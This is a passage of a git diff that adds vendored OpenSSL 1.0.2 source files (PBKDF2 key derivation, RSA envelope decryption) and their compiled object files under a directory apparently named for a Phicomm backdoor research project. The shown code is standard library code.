z)m>Rl<J2vwbbNq$!1$QjsCr%&B<&e3-PNTur{);k&vQjDnkm^V+B>8+@K6&2T0A{m
zbhFk-Q7%JNby$xlcB_g0-RiD*YJeS9#A>ko_YYoNAp1D}Aha3(nB&Vh{uRfUa~xAY
z3dYAA%Hk}8^F~3A-!|g`2aZ=W3feyeh1s`od=<xI9Ixg02*>&P;BN{P`+QDtoR9wn
z#~%hiHXnK~LLbvUW<AC)TK32v;P@pj4(2Ro|0~D&_|qI;&Don=e9WyZ&SD%8#6GUq
z;<#RZ+%+8M<3H)ZdpM5wAR9N$@iiRZ@4$~a@Q*mYmWy+W<BxIN2W=EoTPC!>kv>bD
z<$n?!-aDwrd!g2|#k!xhvf4mAsB0rS3BtD>C&Av~VG_&^VF%5HAf%$i(BPn!29xxV
zt_9(z!+QFmS^d6rE||#<Wwflm7hEx*)(^QMKB!p}`k$2#{PF1RH((eT%6Wbhpl`h<
zREG~dV|)j~P<T0RUFDZ7e|)FVm)-FAO`$vi1v&ejgbbzH4vKi*_)i1Jn0E93>MwvV
zj$aRj7v|r~Luj-0vpQ_Ckj*Y-P3S2bXMU{4{K?w9>4)|OSxUQY4{-c7WjiMFiRJIJ
z{8+{IpY`8_2FA4ee{K1XFhi@h`{PAW?)+ab{y@9`I~Kc`&zL_u|8isFP$3M8V$B2p
l&Mt*w_s5v!wkl-(#O$$cn5|3jZYt-0+?xM>(DP#V{})J@_)7o)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt2.c
new file mode 100644
index 0000000..f2ae1e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt2.c
@@ -0,0 +1,334 @@
+/* p5_crpt2.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#if !defined(OPENSSL_NO_HMAC) && !defined(OPENSSL_NO_SHA)
+# include <openssl/x509.h>
+# include <openssl/evp.h>
+# include <openssl/hmac.h>
+# include "evp_locl.h"
+
+/* set this to print out info about the keygen algorithm */
+/* #define DEBUG_PKCS5V2 */
+
+# ifdef DEBUG_PKCS5V2
+static void h__dump(const unsigned char *p, int len);
+# endif
+
+/*
+ * This is an implementation of PKCS#5 v2.0 password based encryption key
+ * derivation function PBKDF2. SHA1 version verified against test vectors
+ * posted by Peter Gutmann <pgut001@cs.auckland.ac.nz> to the PKCS-TNG
+ * <pkcs-tng@rsa.com> mailing list.
+ */
+
+int PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
+                      const unsigned char *salt, int saltlen, int iter,
+                      const EVP_MD *digest, int keylen, unsigned char *out)
+{
+    unsigned char digtmp[EVP_MAX_MD_SIZE], *p, itmp[4];
+    int cplen, j, k, tkeylen, mdlen;
+    unsigned long i = 1;
+    HMAC_CTX hctx_tpl, hctx;
+
+    mdlen = EVP_MD_size(digest);
+    if (mdlen < 0)
+        return 0;
+
+    HMAC_CTX_init(&hctx_tpl);
+    p = out;
+    tkeylen = keylen;
+    if (!pass)
+        passlen = 0;
+    else if (passlen == -1)
+        passlen = strlen(pass);
+    if (!HMAC_Init_ex(&hctx_tpl, pass, passlen, digest, NULL)) {
+        HMAC_CTX_cleanup(&hctx_tpl);
+        return 0;
+    }
+    while (tkeylen) {
+        if (tkeylen > mdlen)
+            cplen = mdlen;
+        else
+            cplen = tkeylen;
+        /*
+         * We are unlikely to ever use more than 256 blocks (5120 bits!) but
+         * just in case...
+         */
+        itmp[0] = (unsigned char)((i >> 24) & 0xff);
+        itmp[1] = (unsigned char)((i >> 16) & 0xff);
+        itmp[2] = (unsigned char)((i >> 8) & 0xff);
+        itmp[3] = (unsigned char)(i & 0xff);
+        if (!HMAC_CTX_copy(&hctx, &hctx_tpl)) {
+            HMAC_CTX_cleanup(&hctx_tpl);
+            return 0;
+        }
+        if (!HMAC_Update(&hctx, salt, saltlen)
+            || !HMAC_Update(&hctx, itmp, 4)
+            || !HMAC_Final(&hctx, digtmp, NULL)) {
+            HMAC_CTX_cleanup(&hctx_tpl);
+            HMAC_CTX_cleanup(&hctx);
+            return 0;
+        }
+        HMAC_CTX_cleanup(&hctx);
+        memcpy(p, digtmp, cplen);
+        for (j = 1; j < iter; j++) {
+            if (!HMAC_CTX_copy(&hctx, &hctx_tpl)) {
+                HMAC_CTX_cleanup(&hctx_tpl);
+                return 0;
+            }
+            if (!HMAC_Update(&hctx, digtmp, mdlen)
+                || !HMAC_Final(&hctx, digtmp, NULL)) {
+                HMAC_CTX_cleanup(&hctx_tpl);
+                HMAC_CTX_cleanup(&hctx);
+                return 0;
+            }
+            HMAC_CTX_cleanup(&hctx);
+            for (k = 0; k < cplen; k++)
+                p[k] ^= digtmp[k];
+        }
+        tkeylen -= cplen;
+        i++;
+        p += cplen;
+    }
+    HMAC_CTX_cleanup(&hctx_tpl);
+# ifdef DEBUG_PKCS5V2
+    fprintf(stderr, "Password:\n");
+    h__dump(pass, passlen);
+    fprintf(stderr, "Salt:\n");
+    h__dump(salt, saltlen);
+    fprintf(stderr, "Iteration count %d\n", iter);
+    fprintf(stderr, "Key:\n");
+    h__dump(out, keylen);
+# endif
+    return 1;
+}
+
+int PKCS5_PBKDF2_HMAC_SHA1(const char *pass, int passlen,
+                           const unsigned char *salt, int saltlen, int iter,
+                           int keylen, unsigned char *out)
+{
+    return PKCS5_PBKDF2_HMAC(pass, passlen, salt, saltlen, iter, EVP_sha1(),
+                             keylen, out);
+}
+
+# ifdef DO_TEST
+main()
+{
+    unsigned char out[4];
+    unsigned char salt[] = { 0x12, 0x34, 0x56, 0x78 };
+    PKCS5_PBKDF2_HMAC_SHA1("password", -1, salt, 4, 5, 4, out);
+    fprintf(stderr, "Out %02X %02X %02X %02X\n",
+            out[0], out[1], out[2], out[3]);
+}
+
+# endif
+
+/*
+ * Now the key derivation function itself. This is a bit evil because it has
+ * to check the ASN1 parameters are valid: and there are quite a few of
+ * them...
+ */
+
+int PKCS5_v2_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
+                          ASN1_TYPE *param, const EVP_CIPHER *c,
+                          const EVP_MD *md, int en_de)
+{
+    const unsigned char *pbuf;
+    int plen;
+    PBE2PARAM *pbe2 = NULL;
+    const EVP_CIPHER *cipher;
+
+    int rv = 0;
+
+    if (param == NULL || param->type != V_ASN1_SEQUENCE ||
+        param->value.sequence == NULL) {
+        EVPerr(EVP_F_PKCS5_V2_PBE_KEYIVGEN, EVP_R_DECODE_ERROR);
+        goto err;
+    }
+
+    pbuf = param->value.sequence->data;
+    plen = param->value.sequence->length;
+    if (!(pbe2 = d2i_PBE2PARAM(NULL, &pbuf, plen))) {
+        EVPerr(EVP_F_PKCS5_V2_PBE_KEYIVGEN, EVP_R_DECODE_ERROR);
+        goto err;
+    }
+
+    /* See if we recognise the key derivation function */
+
+    if (OBJ_obj2nid(pbe2->keyfunc->algorithm) != NID_id_pbkdf2) {
+        EVPerr(EVP_F_PKCS5_V2_PBE_KEYIVGEN,
+               EVP_R_UNSUPPORTED_KEY_DERIVATION_FUNCTION);
+        goto err;
+    }
+
+    /*
+     * lets see if we recognise the encryption algorithm.
+     */
+
+    cipher = EVP_get_cipherbyobj(pbe2->encryption->algorithm);
+
+    if (!cipher) {
+        EVPerr(EVP_F_PKCS5_V2_PBE_KEYIVGEN, EVP_R_UNSUPPORTED_CIPHER);
+        goto err;
+    }
+
+    /* Fixup cipher based on AlgorithmIdentifier */
+    if (!EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, en_de))
+        goto err;
+    if (EVP_CIPHER_asn1_to_param(ctx, pbe2->encryption->parameter) < 0) {
+        EVPerr(EVP_F_PKCS5_V2_PBE_KEYIVGEN, EVP_R_CIPHER_PARAMETER_ERROR);
+        goto err;
+    }
+    rv = PKCS5_v2_PBKDF2_keyivgen(ctx, pass, passlen,
+                                  pbe2->keyfunc->parameter, c, md, en_de);
+ err:
+    PBE2PARAM_free(pbe2);
+    return rv;
+}
+
+int PKCS5_v2_PBKDF2_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass,
+                             int passlen, ASN1_TYPE *param,
+                             const EVP_CIPHER *c, const EVP_MD *md, int en_de)
+{
+    unsigned char *salt, key[EVP_MAX_KEY_LENGTH];
+    const unsigned char *pbuf;
+    int saltlen, iter, plen;
+    int rv = 0;
+    unsigned int keylen = 0;
+    int prf_nid, hmac_md_nid;
+    PBKDF2PARAM *kdf = NULL;
+    const EVP_MD *prfmd;
+
+    if (EVP_CIPHER_CTX_cipher(ctx) == NULL) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_NO_CIPHER_SET);
+        goto err;
+    }
+    keylen = EVP_CIPHER_CTX_key_length(ctx);
+    OPENSSL_assert(keylen <= sizeof key);
+
+    /* Decode parameter */
+
+    if (!param || (param->type != V_ASN1_SEQUENCE)) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_DECODE_ERROR);
+        goto err;
+    }
+
+    pbuf = param->value.sequence->data;
+    plen = param->value.sequence->length;
+
+    if (!(kdf = d2i_PBKDF2PARAM(NULL, &pbuf, plen))) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_DECODE_ERROR);
+        goto err;
+    }
+
+    keylen = EVP_CIPHER_CTX_key_length(ctx);
+
+    /* Now check the parameters of the kdf */
+
+    if (kdf->keylength && (ASN1_INTEGER_get(kdf->keylength) != (int)keylen)) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_UNSUPPORTED_KEYLENGTH);
+        goto err;
+    }
+
+    if (kdf->prf)
+        prf_nid = OBJ_obj2nid(kdf->prf->algorithm);
+    else
+        prf_nid = NID_hmacWithSHA1;
+
+    if (!EVP_PBE_find(EVP_PBE_TYPE_PRF, prf_nid, NULL, &hmac_md_nid, 0)) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_UNSUPPORTED_PRF);
+        goto err;
+    }
+
+    prfmd = EVP_get_digestbynid(hmac_md_nid);
+    if (prfmd == NULL) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_UNSUPPORTED_PRF);
+        goto err;
+    }
+
+    if (kdf->salt->type != V_ASN1_OCTET_STRING) {
+        EVPerr(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN, EVP_R_UNSUPPORTED_SALT_TYPE);
+        goto err;
+    }
+
+    /* it seems that its all OK */
+    salt = kdf->salt->value.octet_string->data;
+    saltlen = kdf->salt->value.octet_string->length;
+    iter = ASN1_INTEGER_get(kdf->iter);
+    if (!PKCS5_PBKDF2_HMAC(pass, passlen, salt, saltlen, iter, prfmd,
+                           keylen, key))
+        goto err;
+    rv = EVP_CipherInit_ex(ctx, NULL, NULL, key, NULL, en_de);
+ err:
+    OPENSSL_cleanse(key, keylen);
+    PBKDF2PARAM_free(kdf);
+    return rv;
+}
+
+# ifdef DEBUG_PKCS5V2
+static void h__dump(const unsigned char *p, int len)
+{
+    for (; len--; p++)
+        fprintf(stderr, "%02X ", *p);
+    fprintf(stderr, "\n");
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt2.o
new file mode 100644
index 0000000000000000000000000000000000000000..ccd6fd7f93bff63619635e9fd660d32f7b178372
GIT binary patch
literal 6112
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_dec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_dec.c
new file mode 100644
index 0000000..225b8b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_dec.c
@@ -0,0 +1,87 @@
+/* crypto/evp/p_dec.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int EVP_PKEY_decrypt_old(unsigned char *key, const unsigned char *ek, int ekl,
+                         EVP_PKEY *priv)
+{
+    int ret = -1;
+
+#ifndef OPENSSL_NO_RSA
+    if (priv->type != EVP_PKEY_RSA) {
+#endif
+        EVPerr(EVP_F_EVP_PKEY_DECRYPT_OLD, EVP_R_PUBLIC_KEY_NOT_RSA);
+#ifndef OPENSSL_NO_RSA
+        goto err;
+    }
+
+    ret =
+        RSA_private_decrypt(ekl, ek, key, priv->pkey.rsa, RSA_PKCS1_PADDING);
+ err:
+#endif
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_dec.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_dec.o
new file mode 100644
index 0000000000000000000000000000000000000000..45f3f777d4713277b5b59349ed5f8ca4ef595c64
GIT binary patch
literal 1672
zcmbtU&1(};5TEVVwrZ?V1cge;NfhlP(SmIck~D0RYOo>wfC^>VB&${Pv25N-<3SHO
z1uwn%Ux-KXpaC!H$(#NOdK6EJ5NCGZOE)j;MF%GHo8OyxGjHD8JT;2B2~7hj8r*<G
zPqF|7{Sc>pn1&M&gC8g7e|49qyt8Y)pM_^@iQebTE6OkSK7OMxS}(nRfXGPoQy<<u
zNAz|If4-tZ_x<3`JIH6VD~XF+6|c#?#4@|ak_)Npp6{lfTurj%;-!Gbj7iiu>JilZ
z?Jbx9=o2T~JA;@+dt3%>Kd#Nire_YYA>z;bD*#!t_H2B2c1AGchR!ev-v{F>R4Zyi
z#LF&5vvj}fQI0$vXb|I~!}K_bj1JNL>i#rFQ;wp0I@G6sX5{8kX@06KA`!(G{=$P}
z*6b>)g0WpPOSg<2a@~%@%~rhzX1=(-nkky=x!i`aX>Mj#i-rm1jg0BI_a9l@meF98
z%ckRT({|mKi?vonV|1r6)Zc?Z<lPZ}Jj5puli)k>)pzKJwL1-NRnT%buzM1@cHLs!
z-siw-7Po*^+HGLfR-<7zk!!ZN&G2n4w7FG%DExa(k2!A3v0dH)=I>zdnRi{QVGm3G
z4@h7#y(;xZq>&?$_ZN6Uti)vJP-!-4)UX`TU{I2Qfn#W?j(kby1b;#B>I?3Qb=9a}
zz!eOjJ^wX7g}Jn+>=U6cvi@aB2rKJLOYcVFaOjJ$6T)ijO<bd|PK;|9`BI?7kO_dC
zpQI}YXiqi&lL%1HrRMKqT-5#b#fI{p=>8~I=1V@RwqIHtbV*qHcIdxB%_mO1JIY@Y
a^|#3hiP&z)oI(_p|3&22hmiqL^Zx*zO^ho5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_enc.c
new file mode 100644
index 0000000..f565f33
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_enc.c
@@ -0,0 +1,87 @@
+/* crypto/evp/p_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
